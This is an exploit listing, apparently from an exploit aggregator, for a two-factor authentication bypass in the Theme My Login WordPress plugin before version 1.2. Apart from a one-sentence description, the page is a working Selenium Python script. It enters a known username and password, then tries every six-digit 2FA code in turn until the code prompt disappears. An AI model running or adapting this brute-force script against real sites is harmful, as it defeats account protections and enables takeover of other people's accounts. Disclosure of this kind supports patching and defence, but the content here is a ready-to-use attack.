Share
## https://sploitus.com/exploit?id=PACKETSTORM:174765
The theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit:  
  
from typing import KeysView  
from selenium.webdriver.common.by import By  
from selenium import webdriver  
from selenium.webdriver.support.ui import WebDriverWait   
from selenium.webdriver.support import expected_conditions as EC   
  
driver = webdriver.Firefox()  
driver.get("websiteloginhere")  
  
# Locate the username field by its 'id' attribute and fill it in   
username_field = driver.find_element(By.ID, "user_login")   
username_field.click()   
username_field.send_keys("usernamehere")   
  
# Locate the password field by its 'id' attribute and fill it in   
password_field = driver.find_element(By.ID, "user_pass")   
password_field.click()   
password_field.send_keys("passwordhere")   
  
# Locate the Log In button and click it   
login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']")   
login_button.click()   
  
# FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting   
  
for i in range(1000000):   
code = str(i).zfill(6)   
  
try:   
wait = WebDriverWait(driver, 10)   
code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']")))   
except:   
break   
  
code_field.click()   
code_field.clear()   
code_field.send_keys(code)   
  
verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']")   
verify_button.click()